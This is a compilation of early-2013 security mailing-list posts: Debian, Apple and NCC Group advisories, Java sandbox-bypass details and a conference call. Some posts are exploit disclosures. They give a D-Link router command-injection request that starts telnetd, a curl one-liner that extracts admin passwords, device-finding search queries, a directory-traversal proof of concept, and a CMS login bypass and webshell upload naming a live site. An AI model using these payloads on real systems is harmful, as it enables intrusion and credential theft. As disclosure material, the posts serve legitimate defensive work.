CVE-2013-1473 CVE-2013-1475 CVE-2013-1476 CVE-2013-1478 CVE-2013-1480 CVE-2013-1481 Java for Mac OS X 10.6 Update 12 may be obtained from the Software Update pane in System Preferences or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ The download file is named: JavaForMacOSX10.6.dmg Its SHA-1 digest is: 0c790491ca22ee009086ee1ec1f1b358024dd83e Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJRDHzrAAoJEPefwLHPlZEwARUQAJqht+yZpLhvksCJ+hFcvdGI 6K+xYeHlIwjYmF+/QekNxOpkCvdjfaC5YVFKIretUePA7t+E/kkj2UbBrLOpOKfk Sh2OFOTTwFdQf7naDgdIROos5c8iNFUufGzjJFUzjUeEiVDFI37Keij+pttYsPXs 1n9T2YajHAsSsbjb6ldIOhV03WkjIGKH3k9Kn9HiwFA4s0lIB01TiKKEgpUfBVVM HwoHtXrgt5lFbR3w80iyhGKnB/Su2JkQ6yIgK/66OkcvTziyZlxi7HT39MjH7gLK uuKoKfD2jue5P6Sk0YKQ8LA+5qD+ODmYEQwSov1Kf13ARVSBrLnPnw+Chx1rjura QyVAP6q+Ss8Im0wFpXH9HlHWy1FiepABgvhM0GfxB34Qwx3mrG3w5cy4ASQDtveb vXOkko4XKZ1rrTq3GpIX+zl1KVdVQNXjzhN9vx48mqK9IXogAwBQcFJX/P1Bk/2k 38nkjmCD3peSBq1PGwoSO/3nKDXS4mWc2caUSgT//xVrl9hFiss7iuOHT13lnuu9 yXKjNjwH4Mi1LIVEghgr0CLnUiYiHCiGKlBIRWGqHkUGQONtmvQh6aoFg2Er5WrM lFikl3hM5JMm9vpW6pAJRvdfKghniKaO6ekJzlSj6smamBwLBAo+lcDg+Z+FxMOX FeQoXC/8drXJLOuVs4wQ =qzRL -END PGP SIGNATURE-
[SECURITY] [DSA 2614-1] libupnp security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2614-1 secur...@debian.org http://www.debian.org/security/ Yves-Alexis Perez February 01, 2013 http://www.debian.org/security/faq - - Package: libupnp Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2012-5958 CVE-2012-5959 CVE-2012-5960 CVE-2012-5961 CVE-2012-5962 CVE-2012-5963 CVE-2012-5964 CVE-2012-5965 Debian Bug : 699316 Multiple stack-based buffer overflows were discovered in libupnp, a library used for handling the Universal Plug and Play protocol. HD Moore from Rapid7 discovered that SSDP queries where not correctly handled by the unique_service_name() function. An attacker sending carefully crafted SSDP queries to a daemon built on libupnp could generate a buffer overflow, overwriting the stack, leading to the daemon crash and possible remote code execution. For the stable distribution (squeeze), these problems have been fixed in version 1:1.6.6-5+squeeze1. For the testing distribution (wheezy), these problems have been fixed in version 1:1.6.17-1.2. For the unstable distribution (sid), these problems have been fixed in version 1:1.6.17-1.2. We recommend that you upgrade your libupnp packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.19 (GNU/Linux) iQEcBAEBCgAGBQJRDOe7AAoJEG3bU/KmdcClR6sH/1tMFZTfqjzSEvU81ck6m7Fs QD5r45u6YpCfjioo9K6RvRdQ1JqU/8R4sSnrJPVJdf7xiEtxEZJ8DG+A7nt60Dmp iBG8RJYU0lc2KeADEiejZy02V/wGRPi+fe931X6Vpqaho6BUWEyXb0xm6qY2MV8n FrJh8aKYjmOjH2WCGSLitsfC0BNpjc++MP9KFQPMLK6lXq68dz/rDnClWinFeEr0 fehtWrdM17az6fLUihwo9TXByH9gZmdFj/F0vlARBzkv29jUlAtu55hS3nbCJUCB 1rH0HifatkkZ2h4guMDC6SmFFHGxI+9JSz9TrfdkUtb6fwPNB4hGP8TT0GAMhag= =MYvI -END PGP SIGNATURE-
[SECURITY] [DSA 2615-1] libupnp4 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2615-1 secur...@debian.org http://www.debian.org/security/ Yves-Alexis Perez February 01, 2013 http://www.debian.org/security/faq - - Package: libupnp4 Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2012-5958 CVE-2012-5959 CVE-2012-5960 CVE-2012-5961 CVE-2012-5962 CVE-2012-5963 CVE-2012-5964 CVE-2012-5965 Debian Bug : 699459 Multiple stack-based buffer overflows were discovered in libupnp4, a library used for handling the Universal Plug and Play protocol. HD Moore from Rapid7 discovered that SSDP queries where not correctly handled by the unique_service_name() function. An attacker sending carefully crafted SSDP queries to a daemon built on libupnp4 could generate a buffer overflow, overwriting the stack, leading to the daemon crash and possible remote code execution. For the stable distribution (squeeze), these problems have been fixed in version 1.8.0~svn20100507-1+squeeze1. For the testing distribution (wheezy), these problems have been fixed in version 1.8.0~svn20100507-1.2. For the unstable distribution (sid), these problems have been fixed in version 1.8.0~svn20100507-1.2. We recommend that you upgrade your libupnp4 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.19 (GNU/Linux) iQEcBAEBCgAGBQJRDPb/AAoJEG3bU/KmdcClkHcH/3T66iE5QyeUwxE0wGNusOUX Hu4A7ycp8f8PxBbEkU2sQgjTaZ/cDAXc5pf3/McerMBuNp7oBA4Jvmm0IHrrM3As Lkt7f+AE1f6ixpF4OE9NfzZx2EtMDf3KhZwyGGp1BUcXXCYoQoQiFV6A8gcj1ay4 LnksPxFycFhYEs3SLmAXp4HkScQ6zAybtuC4wHI+o/LeMVg2Z94hYJ7E5SiF7iDn /Pm+BzBAsQyQpApHG7a/wIIkfY31DFQB+Rq82nv6VOHqQUlawdcBVB2rN0SA8XMv 5rxV+eQjl5ReOYzoGr7XL7T8d5BJSHXyUfUjKWqYPGqAgRqHaRvn11WkD6OcWwQ= =YQoc -END PGP SIGNATURE-
[SECURITY] [DSA 2617-1] samba security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2617-1 secur...@debian.org http://www.debian.org/security/ Luciano Bello February 02, 2013 http://www.debian.org/security/faq - - Package: samba Vulnerability : several issues Problem type : remote Debian-specific: no CVE ID : CVE-2013-0213 CVE-2013-0214 Jann Horn had reported two vulnerabilities in Samba, a popular cross-platform network file and printer sharing suite. In particular, these vulnerabilities affect to SWAT, the Samba Web Administration Tool. CVE-2013-0213: Clickjacking issue in SWAT An attacker can integrate a SWAT page into a malicious web page via a frame or iframe and then overlaid by other content. If an authenticated valid user interacts with this malicious web page, she might perform unintended changes in the Samba settings. CVE-2013-0214: Potential Cross-site request forgery An attacker can persuade a valid SWAT user, who is logged in, to click in a malicious link and trigger arbitrary unintended changes in the Samba settings. For the stable distribution (squeeze), these problems have been fixed in version 3.5.6~dfsg-3squeeze9. For the testing distribution (wheezy), these problems have been fixed in version 2:3.6.6-5. For the unstable distribution (sid), these problems have been fixed in version 2:3.6.6-5. We recommend that you upgrade your samba packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAlENAmoACgkQQWTRs4lLtHmRtgCgi55rZbXQyGnZSmrffjeH37zV tOUAoKKwc6/g5g2U7Heo6SF3DkegVq11 =R2Mp -END PGP SIGNATURE-
[SECURITY] [DSA 2616-1] nagios3 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2616-1 secur...@debian.org http://www.debian.org/security/Jonathan Wiltshire February 03, 2013 http://www.debian.org/security/faq - - Package: nagios3 Vulnerability : buffer overflow in CGI scripts Problem type : remote Debian-specific: no CVE ID : CVE-2012-6096 Debian Bug : 697930 A buffer overflow problem has been found in nagios3, a host/service/network monitoring and management system. A mailicious client could craft a request to history.cgi and cause application crashes. For the stable distribution (squeeze), this problem has been fixed in version 3.2.1-2+squeeze1. For the testing distribution (wheezy), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 3.4.1-3. We recommend that you upgrade your nagios3 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlEO1QcACgkQXm3vHE4uylrsgwCbB0GyudF6mJRK8N5kcwkHgPkg FMQAoJUXfSiafFspHOhS4pYr4Hnf8Quj =78J1 -END PGP SIGNATURE-
Directory Traversal - EasyITSP = 2.0.7
Directory Traversal - EasyITSP = 2.0.7
EasyITSP - Telephone System VoIP
http://blaszczakm.blogspot.com
Michal Blaszczak
Search/Read/Delete filetype *.txt
Search/Play/Delete filetype *.wav - Voicemail
file: voicemail.php line: 220
foreach (glob($vmdir/$_SESSION[phone]/$vmfolder/*.txt) as $filename) {
file: voicemail.php line: 186 - 190
if(isset($_GET['folder'])) {
$vmfolder = $_GET['folder'];
} else {
$vmfolder = INBOX;
}
POC:
http:///easyitsp/WEB/customer/voicemail.php?currentpage=phonesfolder=../../
Michał Błaszczak
http://blaszczakm.blogspot.com
NGS00336 Patch Notification: Symantec Network Access Control Privilege Escalation
Medium Risk Vulnerability in Symantec Network Access Control 04 February 2013 Gavin Jones of NCC Group has discovered a Medium risk vulnerability in Symantec Endpoint Protection Version 12.1.1000.157.105 Impact: Privilege escalation Versions affected: Symantec Network Access Control v12.1 and previous An updated version of the software has been released to address the vulnerability: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisorypvid=security_advisoryyear=suid=20121210_00 NCC Group is going to withhold details of this flaw for three months. This three month window will allow users the time needed to apply the patch before the details are released to the general public. This reflects the NCC Group approach to responsible disclosure. NCC Group Research http://www.nccgroup.com For more information please visit a href=http://www.mimecast.com;http://www.mimecast.combr This email message has been delivered safely and archived online by Mimecast. /a
NGS00315 Patch Notification: Symantec Enterprise Security Management Agent Privilege Escalation
Medium Risk Vulnerability in Symantec Enterprise Security Management 04 February 2013 Gavin Jones of NCC Group has discovered a Medium risk vulnerability in Symantec Enterprise Security Management 9.0.1 Agent (version 9.0.1153.20001) Impact: Privilege escalation Versions affected: Symantec Enterprise Security Manager (and Agent) for Windows v10.x and previous An updated version of the software has been released to address the vulnerability: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisorypvid=security_advisoryyear=suid=20121213_00 NCC Group is going to withhold details of this flaw for three months. This three month window will allow users the time needed to apply the patch before the details are released to the general public. This reflects the NCC Group approach to responsible disclosure. NCC Group Research http://www.nccgroup.com For more information please visit a href=http://www.mimecast.com;http://www.mimecast.combr This email message has been delivered safely and archived online by Mimecast. /a
[SE-2012-01] Details of issues fixed by Feb 2013 Java SE CPU
Hello All, Below, we are providing you with technical details regarding security issues reported by us to Oracle and addressed by the company in a recent Feb 2013 Java SE CPU [1]. [Issue 29] This issue allows for the creation of arbitrary Proxy objects for interfaces defined in restricted packages. Proxy objects defined in a NULL class loader namespaces are of a particular interest here. Such objects can be used to manipulate instances of certain restricted classes. In our Proof of Concept code we create such a proxy object for the com.sun.xml.internal.bind.v2.model.nav.Navigator interface. In order to use the aforementioned proxy object, we need an instance of that interface too. We obtain it with the help of Issue 28, which allows to access arbitrary field objects from restricted classes and interfaces. As a result, by combining Issue 27-29, one can use Navigator interface and make use of its sensitive Reflection API functionality such as obtaining access to methods of arbitrary classes. That condition can be further leveraged to obtain a complete JVM security bypass. Please, note that our Proof of Concept code for Issues 27-29 was reported to Oracle in Apr 2012 and depending Issues 27-28 were addressed by the company sooner than Issue 29. Testing of the PoC will thus give best results on older versions of Java SE 7. [Issue 50] Issue 50 allows to violate a fundamental security constraint of Java VM, which is type safety. This vulnerability is another instance of the problem related to the unsafe deserialization implemented by com.sun.corba.se.impl.io.ObjectStreamClass class. Its first instance was fixed by Oracle in Oct 2011 [2] and it stemmed from the fact that during deserialization insufficient type checks were done with respect to object references that were written to target object instance created by the means of deserialization. Such a reference writing was accomplished with the use of a native functionality of sun.corba.Bridge class. The problem that we found back in Sep 2012 was very similar to the first one. It was located in the same code (class) and was also exploiting direct writing of object references to memory with the use of putObject method. While the first type confusion issue allowed to write object references of incompatible types to correct field offsets, Issue 50 relied on the possibility to write object references of incompatible types to...invalid field offsets. It might be also worth to mention that Issue 50 was found to be present in Java SE Embedded [3]. That is Java version that is based on desktop Java SE and is used in today’s most powerful embedded systems such as aircraft and medical systems [4]. We verified that Oracle Java SE Embedded ver. 7 Update 6 from 10 Aug 2012 for ARM / Linux contained vulnerable implementation of ObjectStreamClass class. Unfortunately, we don't know any details regarding the impact of Issue 50 in the embedded space (which embedded systems are vulnerable to it, whether any feasible attack vectors exist, etc.). So, it's up to Oracle to clarify any potential concerns in that area. [Issue 52] Issue 52 relies on the possibility to call no-argument methods on arbitrary objects or classes. The vulnerability has its origin in com.sun.jmx.mbeanserver.Introspector class which is located in the same package as the infamous MBeanInstantiator bug found in the wild in early Jan 2013. The flaw stems from insecure call to invoke method of java.lang.reflect.Method class: if (method != null) return method.invoke(obj, new Object[0]); In our Proof of Concept code we exploit the above implementation by making a call to getDeclaredMethods method of java.lang.Class class to gain access to methods of restricted classes. This is accomplished with the use of the following code sequence: Introspector.elementFromComplex((Object)clazz,declaredMethods) Access to public method objects of arbitrary restricted classes is sufficient to achieve a complete Java VM security sandbox compromise. We make use of DefiningClassLoader exploit vector for that purpose. [Issue 53] Issue 53 stems from the fact that Oracle's implementation of new security levels introduced by the company in Java SE 7 Update 10 did not take into account the fact that Applets can be instantiated with the use of serialization. Such a possibility is indicated both in HTML 4 Specification [5] as well as in Oracle's code. HTML 4 Specification contains the following description for the object attribute of APPLET element: object = cdata [CS] This attribute names a resource containing a serialized representation of an applet's state. It is interpreted relative to the applet's codebase. The serialized data contains the applet's class name but not the implementation. The class name is used to retrieve the implementation from a class file or archive. Additionally, Java 7 Update 10 (and 11) reveal the following code logic when it comes to
[IMF 2013] Call for Participation
Dear all, please find enclosed the call for participation for IMF 2013. See the program at: http://www.imf-conference.org/imf2013/program.html The conference will take place from Tuesday, March 12th through Thursday, March 14th in Nuremberg, Germany. Registration Details can be found at: http://www.imf-conference.org/imf2013/registration.html Early registration discounts will be available until February 25th, 2013. Information on booking hotel rooms can be found here: http://www1.gi-ev.de/fachbereiche/sicherheit/fg/sidar/imf/imf2013/location.html Room allocations are not depleted yet and can be used until February 6th. Please excuse possible cross postings. CALL FOR PARTICIPATION IMF 2013 7th International Conference on IT Security Incident Management IT Forensics March 12th - 14th, 2013 Nuremberg, Germany Conference Background = Today IT security is an integral aspect in operating IT-Systems. Yet, despite high-end precautionary measures taken, not every attack or security mishap can be prevented and hence incidents will go on happening. In such cases forensic capabilities in investigating incidents in both technical and legal aspects are paramount. Thus, capable incident response and forensic procedures have gained essential relevance in IT infrastructure operations and there is ample need for research and standardization in this area. In law enforcement IT forensics is an important branch and its significance constantly increases since IT has become an essential part in almost every aspect of daily life. IT systems produce traces and evidence in many ways that play a more and more relevant role in resolving cases. Conference Goals The IMF conference provides a platform for experts from throughout the world to present and discuss recent technical and methodical advances in the fields of IT security incident response and management and IT forensics. It shall enable collaboration and exchange of ideas between industry (both as users and solution providers), academia, law-enforcement and other government bodies. CONFERENCE PROGRAM == Please find the conference program at: http://www.imf-conference.org/imf2013/program.html REGISTRATION Please find an overview of the conference fees as well as the registration form at: http://www.imf-conference.org/imf2013/registration.html Early registration discounts will be available until February 25th, 2013 Conference Chair Felix Freiling Friedrich-Alexander-Universitaet Erlangen-Nuernberg chair-2...@imf-conference.org Program Chair = Holger Morgenstern IT Expert Witness, gutachten.info pc-chair-2...@imf-conference.org Sponsor Chair = sponsor-chair-2...@imf-conference.org Organizing Committee Jack Cole Ralf Ehlert Felix Freiling Sandra Frings Oliver Goebel Detlef Guenther Stefan Kiltz Holger Morgenstern Jens Nedon Dirk Schadt Programm Committee == Rafael Accorsi, Universitaet Freiburg, Germany Harald Baier, Hochschule Darmstadt/CASED, Germany Davide Balzarotti, Institut Eurecom, France Herbert Bos, VU Amsterdam, Netherlands Susan Brenner, University of Dayton, USA Levente Buttyan, TU Budapest/CRYSYS, Hungary Jack Cole, US Army Research Laboratory, USA Andrew Cormack, JANET, UK Ralf Ehlert, Universitaet Magdeburg, Germany Felix Freiling, Friedrich-Alexander-University (FAU), Germany Sandra Frings, Fraunhofer IAO, Germany Pavel Gladyshev, UCD, Ireland Oliver Goebel, Universitaet Stuttgart, Germany Bernd Grobauer, Siemens CERT, Germany Detlef Günther, Volkswagen AG, Germany Vijay Gurbani, Bell Labs, USA Daniel Hammer, Hochschule Offenburg, Germany Bernhard Hämmerli, ACRIS GmbH, Switzerland Stefan Kiltz, Universitaet Magdeburg, Germany Lam Kwok, PrivyLink International Ltd, Singapore Jim Lyle, NIST, USA Bob Martin, MITRE Corp., USA Ralf Moll, LKA Baden-Wuerttemberg, Germany Holger Morgenstern, gutachten.info, Germany Jens Nedon, IABG mbH, Germany Dirk Schadt, SPOT, Germany Mark Schiller, Statton Security Ltd, UK Marko Schuba, FH Aachen, Germany Andreas Schuster, Deutsche Telekom, Germany Asia Slowinska, VU Amsterdam, Netherlands Marco Thorbrügge, ENISA, EU Stephen Wolthusen, Royal Holloway, Univ. of London, UK Steering Committee == Sandra Frings Oliver Goebel Detlef Guenther Holger Morgenstern Jens Nedon Dirk Schadt Under the Auspices of = German Informatics Society (GI e.V.) Wissenschaftszentrum Ahrstr. 45, 53175 Bonn, Germany Tel.: +49 228 302 145, Fax: +49 228 302 167 Special Interest Group SIDAR Supported by
Multiple Vulnerabilities in D'Link DIR-600 and DIR-300 (rev B)
Device Name: DIR-600 / DIR 300 - HW rev B1 Vendor: D-Link Vulnerable Firmware Releases - DIR-300: Firmware Version : 2.12 - 18.01.2012 Firmware Version : 2.13 - 07.11.2012 Vulnerable Firmware Releases - DIR-600: Firmware-Version : 2.12b02 - 17/01/2012 Firmware-Version : 2.13b01 - 07/11/2012 Firmware-Version : 2.14b01 - 22/01/2013 Device Description: D-Link® introduces the Wireless 150 Router (DIR-600), which delivers high performance end-to-end wireless connectivity based on 802.11n technology. The DIR-600 provides better wireless coverage and improved speeds over standard 802.11g*. Upgrading your home network to Wireless 150 provides an excellent solution for experiencing better wireless performance while sharing a broadband Internet connection with multiple computers over a secure wireless network. Source (dead): http://www.dlink.com/us/en/support/product/dir-600-wireless-n-150-home-r... German website: http://www.dlink.de/cs/Satellite?c=TechSupport_Cchildpagename=DLinkEuro... Shodan Torks Shodan search: Server: Linux, HTTP/1.1, DIR-300 Server: Linux, HTTP/1.1, DIR-600 Vulnerability Overview: * OS Command Injection (unauthenticated) = Parameter cmd The vulnerability is caused by missing access restrictions and missing input validation in the cmd parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd to compromise the device. WARNING: You do not need to be authenticated to the device! Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injectino.png starting a telnet server: Request: POST /command.php HTTP/1.1 Host: 192.168.178.222 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://192.168.178.222/ Content-Length: 15 Cookie: uid=hfaiGzkB4z Pragma: no-cache Cache-Control: no-cache cmd=telnetd; You do not need to be authenticated to the device for executing the malicious commands. You could prepare the whole request and execute it without any authentication details. For example you could start the telnetd on other ports and interfaces. So with this you are able to get a full shell *h00ray* Nmap Scan after starting the telnetd: Nmap scan report for 192.168.178.222 Host is up (0.022s latency). Not shown: 995 closed ports PORT STATESERVICE VERSION 1/tcp filtered tcpmux 23/tcpopen telnet BusyBox telnetd 1.14.1 ==!!! snip Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injection-telnetd.png * Information disclosure: Nice server banner to detect this type of devices easily: Server: Linux, HTTP/1.1, DIR-300 Ver 2.12 Server: Linux, HTTP/1.1, DIR-600 Ver 2.12 * For changing the current password there is no request to the current password With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser. * Insecure Cryptographic Storage: There is no password hashing implemented and so it is saved in plain text on the system: # cat var/passwd admin test 0 Positive Technologies has released an advisory in 2011 and D-Link has fixed this issue: http://en.securitylab.ru/lab/PT-2011-30 With the current version of the firmware the passwords are stored again in plaintext. If you combine the plaintext credential vulnerability with the unauthenticated os command injection vulnerability you will get the following one liner to extract the admin password from every vulnerable device: root@bt:~# curl --data cmd=cat /var/passwd http://Target IP/command.php admin THESECRETPASS 0 root@bt:~# * Information Disclosure: Detailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are available via the network. Request: http://Target-IP/DevInfo.txt or try to access version.txt and have a look at the html source ;) Response: HTTP/1.1 200 OK Server: Linux, HTTP/1.1, DIR-600 Ver 2.14 Date: Fri, 31 Dec 1999 18:04:13 GMT Content-Length: 267 Firmware External Version: V2.14 Firmware Internal Version: d1mg Model Name: DIR-600 Hardware Version: Bx WLAN Domain: 826 Kernel: 2.6.33.2 Language: en Graphcal Authentication: Disable LAN MAC: snip WAN MAC: snip WLAN MAC: snip These details are available without authentication. * Local path disclosure Every piece of information is interesting for the attacker. With this we will get some more details about the operating system and its paths. Request: http://IP/router_info.xml Response:
0day full - Free Monthly Websites v2.0 - Multiple Web Vulnerabilities
Title:
==
Free Monthly Websites v2.0 - Multiple Web Vulnerabilities
Date:
=
2013-02-04
References:
===
http://www.vulnerability-lab.com/get_content.php?id=851
VL-ID:
=
851
Common Vulnerability Scoring System:
8.5
Introduction:
=
Free Monthly Websites 2.0 is here and you no longer have to worry about editing
complicated HTML code as we have
taken care of that for you, and you no longer have to worry about anything to
do with website design as we have taken
care of that for you too, adding your Google AdSense Publisher code, taken care
of, ClickBank! All done for you,
here\\\'s how it works. Upload Your Site To Your Domain (this can be done for
you). Login To Your Admin Control Panel.
Personalize Your Website (takes just 5 minutes).
(Copy of the Vendor Homepage: http://www.freemonthlywebsites2.com/ )
Abstract:
=
The independent Vulnerability Laboratory researcher (x-Cisadane) discovered
multiple web vulnerabilities in the Free Monthly Websites v2.0 CMS.
Report-Timeline:
2013-02-04: Public Disclosure
Status:
Published
Exploitation-Technique:
===
Defensiv
Severity:
=
Critical
Details:
Multiple web vulnerabilities are detected in the Free Monthly Websites v2.0
Content Management System.
The first bypass vulnerability allows attackers to bypass the system web
application auth of the admin login.
The secound vulnerability allows to upload for example webshells and access
them after upload via unauthorized web access.
Vulnerable Module(s):
[+] Login Auth (Admin) - Bypass
[+] Upload File - Unauthorized
File Upload Access
Proof of Concept:
=
The vulnerabilities can be exploited by remote attackers without required user
interaction or privileged application user account.
For demonstration or reproduce ...
Dork(s):
inurl:/index_ebay.php
Powered by: Resell Rights Fortune
Generating Traffic to Your Site with Keyword Based Articles
Powered By: Free Monthly Websites 2.0
[ 1 ] Admin Login Bypass
Vulnerable page http://target.com/[path]/admin/index.php
Line
40 form name=frm action=file_io.php method=post onSubmit=return chk()
41 input type=hidden name=do_type value=admin_settings_read
Vulnerable page http://target.com/[path]/admin/login.php
Line
40 form name=frm action=file_io.php method=post onSubmit=return chk()
41 input type=hidden name=do_type value=admin_settings_read
Vulnerable page http://target.com/[path]/admin/file_io.php
Line
14 if($_REQUEST[do_type]==admin_settings_read)
15 {
16 $filename=settings/admin_settings.txt;
17
18 if(!$handle = fopen($filename, 'r'))
19 {
20 echo Cannot open file ($filename);
21 exit;
22 }
23 $contents = fread($handle, filesize($filename));
24 fclose($handle);
25 $argument_arr=explode(#_1_#,$contents);
26
27 if($argument_arr[0]==$_REQUEST[username]
$argument_arr[1]==$_REQUEST[pass])
28 {
29 $_SESSION[logged_in]=true;
30 header(location:welcome.php);
Based at line 16 we know that Admin Username and Password store in
admin_settings.txt NOT on Database!
So When we login into Admin Panel, file_io.php will Read Valid Username and
Password from admin_settings.txt
If you do a direct access to the file admin_settings.txt, The results is
403 Permission Denied
You do not have permission for this request /admin/settings/admin_settings.txt
Picture: http://i48.tinypic.com/2gvlwt4.png
So... How to Bypass Admin Login Page?
1st. Open the Admin Login Page : http://target.com/[path]/admin/index.php
Live Target : http://www.massmoneywebsites.com/admin/
2nd. Inspect Element on the login Form.
Picture: http://i47.tinypic.com/2r5ddp1.png
3rd. Change from
form name=frm action=file_io.php method=post onsubmit=return
chk()/form
input type=hidden name=do_type value=admin_settings_read
CHANGE TO
form name=frm action=file_io.php method=post onsubmit=return
chk()/form
input type=text name=do_type value=admin_settings_write
Then press ENTER (please see pic).
Pic : http://i49.tinypic.com/351z3ib.png
4th. You will see A Login Failed Page : You need to login in to access that
page
Picture: http://i50.tinypic.com/33ws8jb.png
Never Mind About that, just click 'Login Button' and VOILA you get and Admin
Access!
Picture: http://i45.tinypic.com/jzwpea.png
[ 2 ] Upload PHP Backdoor or PHP Shell
This vulnerability works on PREMIUM VERSION of Free Monthly Websites 2.0
So... How to Upload Backdoor (PHP Shell)?
1st. Go to Add/Remove Navigation Page.
http://target.com/[path]/admin/add_main_pages.php
Live Target : http://www.massmoneywebsites.com/admin/add_main_pages.php
2nd. Enter a Name For Your New Navigation Page That You Wish To Add: dwi.php
And click Add New
